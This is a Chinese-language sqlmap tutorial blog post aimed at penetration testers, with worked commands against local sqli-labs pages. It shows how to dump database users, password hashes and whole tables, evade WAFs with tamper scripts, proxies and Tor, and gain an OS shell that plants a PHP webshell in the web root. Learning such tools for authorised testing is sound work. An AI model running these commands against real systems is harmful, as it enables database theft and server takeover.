项目地址:GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover tool

SQLMap支持市面上常见的数据库:支持MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB等数据库的各种安全漏洞检测。基本上在进行渗透测试中,我们能见到的数据库都能进行测试。

SQLMap支持多种注入手法:

  1. 基于布尔的盲注,即可以根据返回页面判断条件真假的注入;
  2. 基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中;
  3. 基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断;
  4. 联合查询注入,可以使用 union 的情况下的注入;
  5. 堆查询注入,可以同时执行多条语句的执行时的注入。

总而言之:SQLMap足以取代我们在渗透测试对SQL注入漏洞的手工测试。通过本篇文章,您将解放双手,灵活的进行SQL注入漏洞测试。话不多说,发车了!!!

SQLMap支持多种功能:数据库指纹识别、数据库枚举、数据提取、访问目标文件系统,并在获取完全的操作权限时执行任意命令。

常用参数介绍

-v  #详细的等级(0-6) 0:只显示Python的回溯,错误和关键消息。 1:显示信息和警告消息。 2:显示调试消息。 3:有效载荷注入。 4:显示HTTP请求。 5:显示HTTP响应头。 6:显示HTTP响应页面的内容 建议使用等级 3 ,可以看到注入语句的Payload,利于入门者学习。-u "http://xxx/Less-1/?id=1" 注入点-f  #指纹判别数据库类型-b  #获取数据库版本信息 -p  #指定可测试的参数(?page=1&id=2 -p "page,id") --level=(1-5) #要执行的测试水平等级,默认为1 level 算是一共注入测试等级,一共是五级,级别越高,检测的内容也就越多,检测级别大于等于 2 时会检测 cookie 是否有注入,检测级别大于等于 3 时会检测 User-Agent 和 Referer 是否有注入。比较推荐使用 5 等级进行测试,确保不会漏掉注入点。--risk=(0-3)  #测试执行的风险等级,默认为1 一共有3个危险等级,也就是说你认为这个网站存在几级的危险等级。和探测等级一个意思,在不确定的情况下,建议设置为3级--time-sec=(2,5) #延迟响应,默认为5 --data #通过POST发送数据 --columns        #列出字段 --current-user   #获取当前用户名称 --current-db     #获取当前数据库名称 --users          #列数据库所有用户 --passwords      #数据库用户所有密码 --privileges     #查看用户权限(--privileges -U root) --dbs            #列出所有数据库 --tables -D ""   #列出指定数据库中的表 --columns -T "user" -D "mysql"      #列出mysql数据库中的user表的所有字段 --dump-all            #列出所有数据库所有表 --dump -T "" -D "" -C ""   #列出指定数据库的表的字段的数据(--dump -T users -D master -C surname) --is-dba      #是否是数据库管理员 --data "" #POST方式提交数据(--data "page=1&id=2") --cookie "用;号分开"      #cookie注入(--cookies=”PHPSESSID=mvijocbglq6pi463rlgk1e4v52; security=low”) --referer ""     #使用referer欺骗(--referer "http://www.baidu.com") --user-agent ""  #自定义user-agent 

基本必会操作

测试GET注入

python sqlmap.py -u "http://127.0.0.1/Less-1/?id=1" -p "id"

测试POST注入

python sqlmap.py -u "http://127.0.0.1/Less-11/" --data="uname=123&passwd=123"

测试Cookie注入

python sqlmap.py -u "https://127.0.0.1" --cookie "customerId=591edabaab5b52292042df8a"

测试SQL注入漏洞是否存在:直接一把梭哈

python sqlmap.py -u "http://127.0.0.1/Less-14/" --level=5 --risk=3

直接指定最高 level,risk 等级,这样可以不漏掉任何一个测试点,但是代价就是比较慢。这个情况适合时间充裕以及最后完全没有办法的梭哈策略。

测试数据包指定字段

使用BurpSuite抓取数据包,对需要测试的位置后面加上 *

POST /Less-11/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/Less-11/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1uname=123*&passwd=123*&submit=Submit

执行语句:

python sqlmap.py -r test.txt -v 3

通过这种方式我们就可以实现对我们想要测试的位置进行测试。

获取数据库信息

查看数据库所有用户:
sqlmap -u "http://xxx/Less-1/?id=1" --users查看数据库所有用户名密码:
sqlmap -u "http://xxx/Less-1/?id=1" --passwords查看数据库当前用户:
sqlmap -u "http://xxx/Less-1/?id=1" --current-user 查看当前数据库用户是否具有root权限:
sqlmap -u "http://xxx/Less-1/?id=1" --is-dba查看所有数据库:
sqlmap -u "http://xxx/sqli/Less-1/?id=1" --dbs查看指定数据库的所有表:
sqlmap -u "http://xxx/sqli/Less-1/?id=1" -D security --tables查看指定表的所有列:
sqlmap -u "http://xxx/sqli/Less-1/?id=1" -D security -T users --columns查看指定列下的数据:
sqlmap -u "http://xxx/sqli/Less-1/?id=1" -D security -T users -C username --dump脱裤:
sqlmap -u "http://xxx/sqli/Less-1/?id=1" -D security -T users --dump-all #爆出数据库security中的users表中的所有数据
sqlmap -u "http://xxx/sqli/Less-1/?id=1" -D security --dump-all   #爆出数据库security中的所有数据
sqlmap -u "http://xxx/sqli/Less-1/?id=1" --dump-all  #爆出该数据库中的所有数据

高端使用指南

WAF绕过

首先我们判断该Web 服务器是否被WAF/IPS/IDS保护着。这点很容易实现,因为我们在漏扫或者使用专门工具来检测是否有WAF,这个检测,在nmap 的NSE,或者WVS的策略或者APPSCAN的策略中都有,我们可以利用这些来判断。在此我们,也介绍使用sqlmap 进行检测是否否WAF/IPS/IDS

sqlmap -u "" --thread 10 --identify-waf   //首选
sqlmap -u "" --thread 10 --check-waf      //备选

使用任意浏览器进行绕过,尤其是在WAF配置不当的时候

sqlmap -u "" --random-agent -v 2

使用HTTP 参数污染进行绕过

sqlmap -u "" --hpp -v 3

使用长的延时来避免触发WAF的机制,这方式比较耗时

sqlmap -u "" --delay=3.5 --time-sec=60

使用代理进行注入

sqlmap -u "" --proxy=211.211.211.211:8080 --proxy-cred=211:985

匿名注入

sqlmap -u "" --tor

使用脚本绕过

sqlmap 官方提供了53个绕过脚本,脚本目录在/usr/share/sqlmap/tamper

指定单个脚本:
sqlmap -u "http://xxx/Less-1/?id=1" --tamper=space2plus.py 指定多个脚本:
sqlmap -u "http://xxx/Less-1/?id=1" --tamper="space2comment.py,space2plus.py"

操作系统命令执行

在数据库为MySQL、PostgreSql或者SQL Server时,可以通过sqlmap执行操作系统命令

当为MySQL数据库时,需满足下面条件:

  • 当前用户为 root
  • 知道网站根目录的绝对路径

执行命令

python sqlmap.py -u "127.0.0.1/Less-1/?id=1" --os-shell

之后会要求选择脚本语言:

which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP
>

之后会要求我们选择路径

what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
>【1】使用公共的默认目录(C:/xampp/htdocs/,C:/wamp/www,C:/Inetpub/wwwroot/)
【2】自定义网络根目录绝对路径
【3】指定自定义的路径文件
【4】暴力破解

执行os-shell的过程中,sqlmap会向网站根目录写入两个文件 tmpblwkd.php 和 tmpueqch.php。真正的木马文件是tmpblwkd.php 。如果是非正常退出sqlmap的话,这两个文件不会被删除。只有当我们输入 x 或 q 退出 sqlmap 时,该文件才会被自动删除。

测试:执行命令dir

文章参考:向两个大佬致谢,在阅读时受益良多!

https://www.freebuf.com/sectool/164608.html
https://www.cnblogs.com/bmjoker/p/9326258.html

最后,创作不易,求各位路过大佬点个赞支持一下。

愿每一个深夜孤独起舞的自己,终将闪闪发光!!!

SQLMap使用教程:从入门到入狱详细指南相关推荐

  1. SQLMap 从入门到入狱详细指南

    SQLMap 是一个开源的渗透测试工具,可以用来进行自动化检测,利用 SQL 注入漏洞,获取数据库服务器的权限.它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存 ...

  2. 史上最全的CTF保姆教程 从入门到入狱【带工具】

    下面分享的资源包含国内9套教程 教程1-CTF从入门到提升四周学习视频教程 教程2-信息安全 CTF比赛培训教程 教程3-CTF从入门到提升 教程4-CTF培训web网络安全基础入门渗透测试教程 教程 ...

  3. 阿里云建站教程文档汇总(详细指南)

    阿里云建站零基础入门 选择服务器(推荐阿里云ECS) 购买和备案域名(时间比较长,建议购买完服务器就做这一步) 部署网站 解析域名(将域名和自身网站挂钩) 本篇汇总教程为使用阿里云建站的新用户介绍了搭 ...

  4. Markdown 入门及语法详细指南 ★

    文章目录 Markdown 简介 Markdown 编辑工具 1. 平台集成 2. 独立软件 3. 插件拓展 Markdown 基本语法 快捷键 1. 标题 2. 文本 3. 列表 4. 引用 5. ...

  5. ElasticSearch最全详细使用教程:入门、索引管理、映射详解、索引别名、分词器、文档管理、路由、搜索详解...

    墨墨导读:之前我们分享了ElasticSearch最全详细使用教程:入门.索引管理.映射详解,本文详细介绍ElasticSearch的索引别名.分词器.文档管理.路由.搜索详解. 一.索引别名 1. ...

  6. 详细SpringBoot教程之入门(一)

    写在前面 鉴于有人留言说想要学习SpringBoot相关的知识,我这里打算写一个SpringBoot系列的相关博文,目标呢是想让看了这一系列博文的同学呢,能够对SpringBoot略窥门径,这一系列的 ...

  7. 【详细】【转】C#中理解委托和事件 事件的本质其实就是委托 RabbitMQ英汉互翼(一),RabbitMQ, RabbitMQ教程, RabbitMQ入门...

    [详细][转]C#中理解委托和事件 文章是很基础,但很实用,看了这篇文章,让我一下回到了2016年刚刚学委托的时候,故转之! 1.委托 委托类似于C++中的函数指针(一个指向内存位置的指针).委托是C ...

  8. Postman:Postman简介、安装、入门使用方法详细攻略

    Postman:Postman简介.安装.入门使用方法详细攻略 目录 Postman简介 Postman安装 Postman入门 1.图文教程 1.1.get案例 1.2.post案例 1.3.get ...

  9. springmvc教程--快速入门教程

    springmvc教程系列: springmvc史上最好教程(3) springmvc史上最好教程(2) 一. SpringMVC架构 1.1. Spring web mvc介绍 Spring web ...

最新文章

  1. (转)eclipse 代码自动补全
  2. android studio下载插件时出现的read time out问题
  3. (32)第一个驱动程序
  4. java params 关键字_转载------C# ref 和 out ,params关键字的用法
  5. python创建线程
  6. I2c 诊断深入解析
  7. carsim中质心加速度_振动CAE分析在空调压缩机支架设计中的应用
  8. 【MySQL】MySQL自带的数据库
  9. Solrflux源码分析-Sql Support within Solr-类Sql的solr搜索实现(2)
  10. System Verilog线程——fork join的理解使用
  11. Linux命令之shutdown
  12. 【React 】基于Antd Design的CheckBox多选框组件封装
  13. 做用dm工具做游戏 需要不需要c语言,DM的C语言课堂笔记
  14. pytho读文件| python文件去重 | python去除重复行
  15. 星三角启动的优缺点和内外接的区别
  16. linux0.11主存管理程序阅读注释笔记
  17. pyqt5学习笔记——QListView与QListWidget
  18. anaconda linux环境变量,配置anaconda环境(linux)
  19. 隐马尔可夫模型(一):模型介绍
  20. Python——学生管理系统

热门文章

  1. 非金融专业是否能报考CFA考试?
  2. 计算某年有多少周(周的起始日期。结束日期)
  3. unity跨场景保存(跨场景BGM的连续播放)
  4. 利用二维数组编程实现功能:输入一个整数n(n不超过10),输出n行的杨辉三角形
  5. 使用EMQX搭建的MQTT服务器 如何转发数据并保存到云端数据库?
  6. IDEA 使用VUE框架
  7. 实现车牌识别之二--使用Yolov3进行车牌定位
  8. 基于asp.net717共享单车管理系统
  9. hadoop集群配置记录
  10. OpenCV05:图片色彩反转及马赛克效果